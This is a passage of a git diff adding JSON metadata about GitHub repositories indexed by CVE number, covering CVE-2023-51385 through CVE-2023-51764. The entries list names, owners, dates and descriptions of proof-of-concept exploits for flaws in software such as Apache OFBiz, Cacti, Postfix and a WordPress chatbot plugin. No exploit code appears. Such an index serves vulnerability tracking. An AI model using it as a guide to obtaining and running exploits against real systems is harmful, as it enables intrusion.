"https:\/\/github.com\/WOOOOONG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WOOOOONG\/CVE-2023-51385", + "description": "CVE-2023-51385 PoC Exploit ", + "fork": false, + "created_at": "2024-01-02T02:12:35Z", + "updated_at": "2024-07-03T04:28:13Z", + "pushed_at": "2024-01-02T06:48:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 738402073, + "name": "CVE-2023-51385", + "full_name": "uccu99\/CVE-2023-51385", + "owner": { + "login": "uccu99", + "id": 155516921, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155516921?v=4", + "html_url": "https:\/\/github.com\/uccu99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uccu99\/CVE-2023-51385", + "description": null, + "fork": false, + "created_at": "2024-01-03T06:28:34Z", + "updated_at": "2024-01-03T06:28:35Z", + "pushed_at": "2024-01-03T06:28:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 738661198, + "name": "exploit-CVE-2023-51385", + "full_name": "julienbrs\/exploit-CVE-2023-51385", + "owner": { + "login": "julienbrs", + "id": 106234742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106234742?v=4", + "html_url": "https:\/\/github.com\/julienbrs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/julienbrs\/exploit-CVE-2023-51385", + "description": null, + "fork": false, + "created_at": "2024-01-03T18:40:44Z", + "updated_at": "2024-01-03T18:40:44Z", + "pushed_at": "2024-01-03T18:41:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 738669696, + "name": "malicious-exploit-CVE-2023-51385", + "full_name": "julienbrs\/malicious-exploit-CVE-2023-51385", + "owner": { + "login": "julienbrs", + "id": 106234742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106234742?v=4", + "html_url": "https:\/\/github.com\/julienbrs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/julienbrs\/malicious-exploit-CVE-2023-51385", + "description": null, + "fork": false, + "created_at": "2024-01-03T19:08:28Z", + "updated_at": "2024-01-03T19:08:28Z", + "pushed_at": "2024-01-03T20:06:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 741050517, + "name": "CVE-2023-51385", + "full_name": "Sonicrrrr\/CVE-2023-51385", + "owner": { + "login": "Sonicrrrr", + "id": 89630690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89630690?v=4", + "html_url": "https:\/\/github.com\/Sonicrrrr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sonicrrrr\/CVE-2023-51385", + "description": null, + "fork": false, + "created_at": "2024-01-09T15:44:52Z", + "updated_at": "2024-01-09T15:44:52Z", + "pushed_at": "2024-01-09T15:57:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745786201, + "name": "CVE-2023-51385", + "full_name": "farliy-hacker\/CVE-2023-51385", + "owner": { + "login": "farliy-hacker", + "id": 62786635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62786635?v=4", + "html_url": "https:\/\/github.com\/farliy-hacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/farliy-hacker\/CVE-2023-51385", + "description": "CVE-2023-51385", + "fork": false, + "created_at": "2024-01-20T06:09:45Z", + "updated_at": "2024-01-20T06:09:46Z", + "pushed_at": "2024-01-20T06:12:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745788678, + "name": "CVE-2023-51385-save", + "full_name": "farliy-hacker\/CVE-2023-51385-save", + "owner": { + "login": "farliy-hacker", + "id": 62786635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62786635?v=4", + "html_url": "https:\/\/github.com\/farliy-hacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/farliy-hacker\/CVE-2023-51385-save", + "description": "CVE-2023-51385-save", + "fork": false, + "created_at": "2024-01-20T06:20:37Z", + "updated_at": "2024-01-20T06:20:38Z", + "pushed_at": "2024-01-20T06:21:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 750239281, + "name": "CVE-2023-51385", + "full_name": "2048JiaLi\/CVE-2023-51385", + "owner": { + "login": "2048JiaLi", + "id": 38320564, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38320564?v=4", + "html_url": "https:\/\/github.com\/2048JiaLi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/2048JiaLi\/CVE-2023-51385", + "description": "CVE-2023-51385 的exp", + "fork": false, + "created_at": "2024-01-30T09:01:05Z", + "updated_at": "2024-01-30T09:02:38Z", + "pushed_at": "2024-01-30T09:02:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787174802, + "name": "CVE-2023-51385-", + "full_name": "thinkliving2020\/CVE-2023-51385-", + "owner": { + "login": "thinkliving2020", + "id": 74002146, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74002146?v=4", + "html_url": "https:\/\/github.com\/thinkliving2020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thinkliving2020\/CVE-2023-51385-", + "description": "CVE-2023-51385 ", + "fork": false, + "created_at": "2024-04-16T03:01:03Z", + "updated_at": "2024-04-16T03:01:04Z", + "pushed_at": "2024-04-16T03:06:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806731455, + "name": "CVE-2023-51385", + "full_name": "c0deur\/CVE-2023-51385", + "owner": { + "login": "c0deur", + "id": 7541172, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7541172?v=4", + "html_url": "https:\/\/github.com\/c0deur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c0deur\/CVE-2023-51385", + "description": null, + "fork": false, + "created_at": "2024-05-27T19:29:55Z", + "updated_at": "2024-05-27T20:01:39Z", + "pushed_at": "2024-05-27T20:01:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814326255, + "name": "CVE-2023-51385_poc", + "full_name": "endasugrue\/CVE-2023-51385_poc", + "owner": { + "login": "endasugrue", + "id": 26721171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26721171?v=4", + "html_url": "https:\/\/github.com\/endasugrue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/endasugrue\/CVE-2023-51385_poc", + "description": null, + "fork": false, + "created_at": "2024-06-12T19:38:42Z", + "updated_at": "2024-06-12T20:34:48Z", + "pushed_at": "2024-06-12T20:34:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815463201, + "name": "CVE-2023-51385-exploit", + "full_name": "MiningBot-eth\/CVE-2023-51385-exploit", + "owner": { + "login": "MiningBot-eth", + "id": 171243902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171243902?v=4", + "html_url": "https:\/\/github.com\/MiningBot-eth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MiningBot-eth\/CVE-2023-51385-exploit", + "description": null, + "fork": false, + "created_at": "2024-06-15T08:27:46Z", + "updated_at": "2024-06-15T08:27:49Z", + "pushed_at": "2024-06-15T08:28:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844807994, + "name": "CVE-2023-51385_test", + "full_name": "Featherw1t\/CVE-2023-51385_test", + "owner": { + "login": "Featherw1t", + "id": 111293739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111293739?v=4", + "html_url": "https:\/\/github.com\/Featherw1t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Featherw1t\/CVE-2023-51385_test", + "description": null, + "fork": false, + "created_at": "2024-08-20T02:25:58Z", + "updated_at": "2024-08-20T02:45:47Z", + "pushed_at": "2024-08-20T02:45:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 912606614, + "name": "CVE-2023-51385POC", + "full_name": "GroundCTL2MajorTom\/CVE-2023-51385POC", + "owner": { + "login": "GroundCTL2MajorTom", + "id": 136243034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136243034?v=4", + "html_url": "https:\/\/github.com\/GroundCTL2MajorTom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GroundCTL2MajorTom\/CVE-2023-51385POC", + "description": null, + "fork": false, + "created_at": "2025-01-06T02:44:07Z", + "updated_at": "2025-01-06T04:10:38Z", + "pushed_at": "2025-01-06T04:10:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 912613572, + "name": "CVE-2023-51385P-POC", + "full_name": "GroundCTL2MajorTom\/CVE-2023-51385P-POC", + "owner": { + "login": "GroundCTL2MajorTom", + "id": 136243034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136243034?v=4", + "html_url": "https:\/\/github.com\/GroundCTL2MajorTom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GroundCTL2MajorTom\/CVE-2023-51385P-POC", + "description": null, + "fork": false, + "created_at": "2025-01-06T03:13:52Z", + "updated_at": "2025-01-06T04:17:35Z", + "pushed_at": "2025-01-06T04:17:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51409.json b/2023/CVE-2023-51409.json new file mode 100644 index 0000000000..f40ee20530 --- /dev/null +++ b/2023/CVE-2023-51409.json @@ -0,0 +1,64 @@ +[ + { + "id": 761865974, + "name": "CVE-2023-51409", + "full_name": "RandomRobbieBF\/CVE-2023-51409", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-51409", + "description": "AI Engine: ChatGPT Chatbot <= 1.9.98 - Unauthenticated Arbitrary File Upload via rest_upload", + "fork": false, + "created_at": "2024-02-22T16:26:57Z", + "updated_at": "2024-07-11T16:38:49Z", + "pushed_at": "2024-02-22T16:29:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 911593300, + "name": "CVE-2023-51409", + "full_name": "Nxploited\/CVE-2023-51409", + "owner": { + "login": "Nxploited", + "id": 188819918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188819918?v=4", + "html_url": "https:\/\/github.com\/Nxploited", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nxploited\/CVE-2023-51409", + "description": null, + "fork": false, + "created_at": "2025-01-03T11:36:12Z", + "updated_at": "2025-01-03T11:53:50Z", + "pushed_at": "2025-01-03T11:53:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5142.json b/2023/CVE-2023-5142.json new file mode 100644 index 0000000000..05762061f9 --- /dev/null +++ b/2023/CVE-2023-5142.json @@ -0,0 +1,33 @@ +[ + { + "id": 707145538, + "name": "CVE-H3C-Report", + "full_name": "kuangxiaotu\/CVE-H3C-Report", + "owner": { + "login": "kuangxiaotu", + "id": 99320591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99320591?v=4", + "html_url": "https:\/\/github.com\/kuangxiaotu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kuangxiaotu\/CVE-H3C-Report", + "description": "CVE-2023-5142", + "fork": false, + "created_at": "2023-10-19T10:09:47Z", + "updated_at": "2023-10-19T10:09:47Z", + "pushed_at": "2023-09-08T01:56:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51448.json b/2023/CVE-2023-51448.json new file mode 100644 index 0000000000..34086dd421 --- /dev/null +++ b/2023/CVE-2023-51448.json @@ -0,0 +1,33 @@ +[ + { + "id": 768047429, + "name": "CVE-2023-51448-cacti-sqli-poc", + "full_name": "jakabakos\/CVE-2023-51448-cacti-sqli-poc", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-51448-cacti-sqli-poc", + "description": null, + "fork": false, + "created_at": "2024-03-06T11:23:11Z", + "updated_at": "2024-06-06T11:58:41Z", + "pushed_at": "2024-03-06T11:23:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51467.json b/2023/CVE-2023-51467.json new file mode 100644 index 0000000000..0360e3c0e3 --- /dev/null +++ b/2023/CVE-2023-51467.json @@ -0,0 +1,305 @@ +[ + { + "id": 736831199, + "name": "CVE-2023-51467", + "full_name": "JaneMandy\/CVE-2023-51467", + "owner": { + "login": "JaneMandy", + "id": 36792635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36792635?v=4", + "html_url": "https:\/\/github.com\/JaneMandy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JaneMandy\/CVE-2023-51467", + "description": "CVE-2023-51467 POC", + "fork": false, + "created_at": "2023-12-29T02:25:43Z", + "updated_at": "2024-11-09T17:57:34Z", + "pushed_at": "2024-01-02T07:28:24Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737019244, + "name": "CVE-2023-51467", + "full_name": "Chocapikk\/CVE-2023-51467", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-51467", + "description": "Apache OfBiz Auth Bypass Scanner for CVE-2023-51467", + "fork": false, + "created_at": "2023-12-29T15:01:46Z", + "updated_at": "2024-09-04T08:57:07Z", + "pushed_at": "2023-12-31T01:23:55Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-ofbiz", + "auth-bypass", + "bugbounty", + "cve-2023-51467", + "cybersecurity", + "ethical-hacking", + "exploit", + "infosec", + "open-source-security", + "patch-management", + "penetration-testing", + "security-automation", + "security-tools", + "vulnerability-detection", + "vulnerability-scanner" + ], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 737064466, + "name": "CVE-2023-51467-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2023-51467-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2023-51467-EXPLOIT", + "description": "A PoC exploit for CVE-2023-51467 - Apache OFBiz Authentication Bypass", + "fork": false, + "created_at": "2023-12-29T17:47:54Z", + "updated_at": "2024-09-25T10:52:29Z", + "pushed_at": "2023-12-31T21:29:59Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication-bypass", + "cve-2023-51467", + "poc", + "ssrf" + ], + "visibility": "public", + "forks": 1, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 738140662, + "name": "Apache-OFBiz-Authentication-Bypass", + "full_name": "jakabakos\/Apache-OFBiz-Authentication-Bypass", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/Apache-OFBiz-Authentication-Bypass", + "description": "This repo is a PoC with to exploit CVE-2023-51467 and CVE-2023-49070 preauth RCE vulnerabilities found in Apache OFBiz.", + "fork": false, + "created_at": "2024-01-02T14:20:10Z", + "updated_at": "2024-12-17T20:19:30Z", + "pushed_at": "2024-03-24T18:20:52Z", + "stargazers_count": 73, + "watchers_count": 73, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 73, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 738955975, + "name": "Exploit_CVE-2023-51467", + "full_name": "Subha-BOO7\/Exploit_CVE-2023-51467", + "owner": { + "login": "Subha-BOO7", + "id": 141217634, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141217634?v=4", + "html_url": "https:\/\/github.com\/Subha-BOO7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Subha-BOO7\/Exploit_CVE-2023-51467", + "description": null, + "fork": false, + "created_at": "2024-01-04T12:44:43Z", + "updated_at": "2024-01-04T12:51:15Z", + "pushed_at": "2024-01-04T12:45:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 739631896, + "name": "CVE-2023-51467-Exploit", + "full_name": "JaneMandy\/CVE-2023-51467-Exploit", + "owner": { + "login": "JaneMandy", + "id": 36792635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36792635?v=4", + "html_url": "https:\/\/github.com\/JaneMandy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JaneMandy\/CVE-2023-51467-Exploit", + "description": "Apache Ofbiz CVE-2023-51467 图形化漏洞利用工具", + "fork": false, + "created_at": "2024-01-06T04:07:07Z", + "updated_at": "2024-09-05T01:30:59Z", + "pushed_at": "2024-01-06T10:33:34Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 39, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 741082767, + "name": "cve-2023-51467", + "full_name": "vulncheck-oss\/cve-2023-51467", + "owner": { + "login": "vulncheck-oss", + "id": 134310220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134310220?v=4", + "html_url": "https:\/\/github.com\/vulncheck-oss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vulncheck-oss\/cve-2023-51467", + "description": "A go-exploit for Apache OFBiz CVE-2023-51467", + "fork": false, + "created_at": "2024-01-09T16:58:06Z", + "updated_at": "2024-11-22T23:28:43Z", + "pushed_at": "2025-01-02T17:20:02Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-51467", + "go-expliot" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 742705000, + "name": "BadBizness-CVE-2023-51467", + "full_name": "2ptr\/BadBizness-CVE-2023-51467", + "owner": { + "login": "2ptr", + "id": 39099220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39099220?v=4", + "html_url": "https:\/\/github.com\/2ptr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/2ptr\/BadBizness-CVE-2023-51467", + "description": "Auto exploit script for the Java web framework OF Biz under CVE-2023-51467. ", + "fork": false, + "created_at": "2024-01-13T05:40:38Z", + "updated_at": "2024-01-14T14:17:16Z", + "pushed_at": "2024-01-13T06:43:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856884125, + "name": "Event-ID-217-Rule-Name-SOC254-Apache-OFBiz-Auth-Bypass-and-Code-Injection-0Day-CVE-2023-51467-", + "full_name": "AhmedMansour93\/Event-ID-217-Rule-Name-SOC254-Apache-OFBiz-Auth-Bypass-and-Code-Injection-0Day-CVE-2023-51467-", + "owner": { + "login": "AhmedMansour93", + "id": 179945455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179945455?v=4", + "html_url": "https:\/\/github.com\/AhmedMansour93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AhmedMansour93\/Event-ID-217-Rule-Name-SOC254-Apache-OFBiz-Auth-Bypass-and-Code-Injection-0Day-CVE-2023-51467-", + "description": "🚨 Just completed an incident report on Event ID 217: Apache OFBiz Auth Bypass and Code Injection 0-Day (CVE-2023-51467). This critical vulnerability allows attackers to bypass authentication and execute code remotely! Stay vigilant and ensure your systems are patched! Big thanks to LetsDefend.io for the platform to practice real-world scenarios.", + "fork": false, + "created_at": "2024-09-13T11:47:07Z", + "updated_at": "2024-09-13T11:48:06Z", + "pushed_at": "2024-09-13T11:48:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51504.json b/2023/CVE-2023-51504.json new file mode 100644 index 0000000000..ab47560cc4 --- /dev/null +++ b/2023/CVE-2023-51504.json @@ -0,0 +1,33 @@ +[ + { + "id": 650964426, + "name": "CVE-2023-51504", + "full_name": "Sybelle03\/CVE-2023-51504", + "owner": { + "login": "Sybelle03", + "id": 107751839, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107751839?v=4", + "html_url": "https:\/\/github.com\/Sybelle03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sybelle03\/CVE-2023-51504", + "description": "This is a dockerized reproduction of the MotoCMS SQL injection (cf exploit db) ", + "fork": false, + "created_at": "2023-06-08T07:37:08Z", + "updated_at": "2023-06-08T08:01:23Z", + "pushed_at": "2023-06-08T08:45:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51518.json b/2023/CVE-2023-51518.json new file mode 100644 index 0000000000..460c2a46a5 --- /dev/null +++ b/2023/CVE-2023-51518.json @@ -0,0 +1,41 @@ +[ + { + "id": 809967783, + "name": "CVE-2023-51518", + "full_name": "mbadanoiu\/CVE-2023-51518", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2023-51518", + "description": "CVE-2023-51518: Preauthenticated Java Deserialization via JMX in Apache James", + "fork": false, + "created_at": "2024-06-03T19:48:53Z", + "updated_at": "2024-12-16T20:25:17Z", + "pushed_at": "2024-06-03T20:09:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2023-51518", + "cves", + "deserialization", + "local-privilege-escalation", + "pre-authentication" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51764.json b/2023/CVE-2023-51764.json new file mode 100644 index 0000000000..911079b831 --- /dev/null +++ b/2023/CVE-2023-51764.json @@ -0,0 +1,128 @@ +[ + { + "id": 735990437, + "name": "CVE-2023-51764", + "full_name": "duy-31\/CVE-2023-51764", + "owner": { + "login": "duy-31", + "id": 20819326, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20819326?v=4", + "html_url": "https:\/\/github.com\/duy-31", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duy-31\/CVE-2023-51764", + "description": "Postfix SMTP Smuggling - Expect Script POC", + "fork": false, + "created_at": "2023-12-26T17:02:20Z", + "updated_at": "2024-10-17T03:35:05Z", + "pushed_at": "2023-12-26T20:16:45Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 736523793, + "name": "CVE-2023-51764", + "full_name": "eeenvik1\/CVE-2023-51764", + "owner": { + "login": "eeenvik1", + "id": 49790977, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49790977?v=4", + "html_url": "https:\/\/github.com\/eeenvik1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eeenvik1\/CVE-2023-51764", + "description": "PoC CVE-2023-51764 ", + "fork": false, + "created_at": "2023-12-28T06:20:13Z", + "updated_at": "2024-09-30T08:27:01Z", + "pushed_at": "2023-12-28T06:33:39Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve" + ], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737562870, + "name": "CVE-2023-51764-POC", + "full_name": 